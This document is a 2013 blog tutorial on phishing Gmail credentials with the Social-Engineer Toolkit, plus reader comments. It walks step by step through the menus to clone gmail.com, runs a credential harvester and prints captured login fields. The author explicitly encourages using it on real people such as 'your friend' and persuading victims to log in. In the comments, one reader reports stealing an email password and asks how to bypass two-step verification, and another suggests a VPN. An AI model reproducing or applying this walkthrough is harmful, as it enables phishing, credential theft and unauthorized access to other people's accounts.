Hack gmail password with social engineering toolkit (SET)

Social Engineering Toolkit

Social engineering toolkit is the most powerful tool for performing social engineering attacks. It is the metasploit of social engineering in a way. It provides a very easy user interface to perform attacks like phishing, browser exploitation etc. In this tutorial we are going to see how it can be used to perform phishing attack to try to hack the gmail password of someone.

Credential Harvester Attack

Credential Harvester attack is one of the options available inside SET, that can create phishing pages and start a server to serve the pages and catch any user login data. Lets do it and see how it works.

Start SET in a terminal. It should come up with its welcome screen.

.M"""bgd `7MM"""YMM MMP""MM""YMM 
                ,MI    "Y   MM    `7 P'   MM   `7 
                `MMb.       MM   d        MM      
                  `YMMNq.   MMmmMM        MM      
                .     `MM   MM   Y  ,     MM      
                Mb     dM   MM     ,M     MM      
                P"Ybmmd"  .JMMmmmmMMM   .JMML.

  [---]        The Social-Engineer Toolkit (SET)         [---]        
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]        Development Team: JR DePre (pr1me)        [---]
  [---]        Development Team: Joey Furr (j0fer)       [---]
  [---]        Development Team: Thomas Werth            [---]
  [---]        Development Team: Garland                 [---]
  [---]                  Version: 3.6                    [---]
  [---]          Codename: 'MMMMhhhhmmmmmmmmm'           [---]
  [---]        Report bugs: [email protected]         [---]
  [---]         Follow me on Twitter: dave_rel1k         [---]
  [---]       Homepage: https://www.trustedsec.com       [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..
    
    Join us on irc.freenode.net in channel #setoolkit

  The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Update SET configuration
   7) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set>

Now for this particular attack type we need to select "Social-Engineering Attacks" from the main menu. Type 1 and press enter. It will again present with a menu that would look like this







Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) QRCode Generator Attack Vector
  10) Powershell Attack Vectors
  11) Third Party Modules

  99) Return back to the main menu.

Over here we have the option to select from various kinds of social engineering attacks. For our purpose select option 2 thats "Website Attack Vectors". Again will come another menu like below

1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Man Left in the Middle Attack Method
   6) Web Jacking Attack Method
   7) Multi-Attack Web Method
   8) Victim Web Profiler
   9) Create or import a CodeSigning Certificate

  99) Return to Main Menu

This time along with this menu, there would be some explanation about each attack. As can be seen the Credential Harvester Attack Method is there on number 3 which we are going to use. It is explained as

The Credential Harvester method will utilize web cloning of a web-site that has a username and password field and harvest all the information posted to the website.

So select number 3 and proceed. It will present another menu like this

1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

Now over here we are going to clone gmail.com to construct our phishing page. So select option 2.

set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.1.7
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://www.gmail.com

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[!] I have read the above message.

      Press <return> to continue

[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:

On selecting option 2, it will ask for 2 important piece of information. The first is the ip address, to which it would submit the data and second is the url to clone which is in this case gmail.com

So enter the details and press enter when it asks to press return. Now the credential harvester would start a web server on port 80 which would serve the page gmail.com. Open the ip address of the machine in the browser from some other machine or just localhost. For example if SET is running on machine with ip address 192.168.1.10 then open that ip in a browser from another machine "http://192.168.1.10". Or give the ip address to someone else over the network :)

Now, when the username,password is entered and submitted, SET would capture the data and display on the terminal. Moreover, after capturing the data SET would redirect the user to the actual site, that is gmail.com

192.168.1.101 - - [15/Apr/2013 14:56:39] "GET / HTTP/1.1" 200 -
192.168.1.101 - - [15/Apr/2013 14:56:41] "GET / HTTP/1.1" 200 -
192.168.1.101 - - [15/Apr/2013 14:56:41] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: continue=http://mail.google.com/mail/
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-2825129499091793842
PARAM: ltmpl=default
PARAM: scc=1
PARAM: GALX=W37Icb1p3hI
PARAM: pstMsg=1
PARAM: dnConn=
PARAM: checkConnection=
PARAM: checkedDomains=youtube
PARAM: timeStmp=
PARAM: secTok=
PARAM: _utf8=?
PARAM: bgresponse=!A0KPFdMuBMNZHUQml6hMF2ywpQ8AAxYG6ioCp0BIO0i9C5ftMNPRDRHTXxtZBB9qRoqUjLWLXn3dAJbKr3pT1eJNOwSvoduAgjxCOgnH8u3KZWS0A9kO9pIXNZXJ77OdsqK0T66SEdQLC9QV7QI8op3SM6ldH3rKqEbikKatd9DbrD7QLx3NWHfFR5O6r7PCgCDebXNk56ww-4wiFFmne05oW0ZDMstszHdBd67Z5lleTbvO2544iGrszfYzA1AJU1djcawccdN4bK2WUP1BUPQL3fidQRha5YeNe2cq81e-81DO4AjNX7OfINtsm8zpeSWOX5tHDNZWCnVwz6X5ItbkYNsfZuo9PQvJ5etzTvg6gwCpCZUDtHGR8AwSgxjQsy_hKfuJEmFNmNXFpyUi0Tu_Dw1WckbMNvRcrAhsb682WRI616BFc3aNbwNwfhRC1D6L20oxXcpzshpXxMLQDQr5GoUC6V7FIoTF9ma6mYddyrxdoxmo4d2Vh2vtovJxcYVMNRJpPa-7vvG7Ml_TQC9QJpJ21B608tccYKQpE9FzCzvmVxLMo1SHpr-Q3HChWkx7y-yq4Ba9fkKvt7XuOaq0isbZKeF_y8N1DJqGYusajFb7-jMDkQpnn6uQ-Y1OqalGQ56KSjgyWckWzPnTQ65V5V0doSbmcds8pvkWLFLQ8WM6EDMdX5RT9v5H5fkeMTWadlrJyumtHeerC5fw8qp4G_ZzH8232qySHq21XWvLxcoUS0eXHd8bGn1IA84ZpCuMt7WwEWuXss2OIrf_pfN4-YM3pLtuPIhuAnGoKAJsXS7Sib2cX34mEIiuIeC0fw1CbVqHVRz2nVT8a_QvvAeIYh5HhCz0dbn_P2FE_gosd3wG6Abnh7d08orC0TbzaW61y7H2r0owwU_SRDUKoPmVhVtp-GwjEoEanv7eZ22RgrE
POSSIBLE USERNAME FIELD FOUND: Email=ghj
POSSIBLE PASSWORD FIELD FOUND: Passwd=ghj
PARAM: signIn=Sign+in
PARAM: PersistentCookie=yes
PARAM: rmShown=1
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

See the fields Email and Passwd, they contain the details typed by user. If you want to carry out this hack on a real user like your friend or someone, then you have to give them a link that they can open from their computer and access the SET clone of gmail.

If you have SET running on your local machine then you have to give your public ip address to the victim. He would open the link and get the login page of gmail. The rest of task is to persuade him to login through that page. If you are able to do so, then you get the login details. The credential harvester attack is not limited to just stealing the login data. It can capture any generic form submission.

Phishing attacks are very common in the form of spam emails. Hackers setup phishing pages on webhosts and then spread the links over email to users. The phishing pages includes simple email sites to bank logins and even more.

Last Updated On : 15th April 2013

Subscribe to get updates delivered to your inbox

7 Comments + Add Comment

  • is there a way to only grab a CERTAIN post in the harvester? i am doing some work for a company and they don’t want me grabbing passwords, just usernames.. any ideas?

  • I have also port forwarded my router as well

  • well worked great, now I have the password of an email, but how i can trick gmail to let me access the account? from another country? she ask for 2 steps access, it is possible to use some of the param?

    • VPN

  • Very interesting post! i followed your instrustions, everything ok working inside LAN, but when i tried to use my external ip, the the rooter login page appeared instead of gmail. I use no-ip duc and hamachi vpn instead of port forwarding. Any guess? Thanks in advance

    • I have not used hamachi vpn, so not sure how to do this.

    • You have to configure port forwarding on your router. There will be a tutorial on this in the upcoming issue of ALM @ Facebook.com/AnonLinkPublications

Leave a comment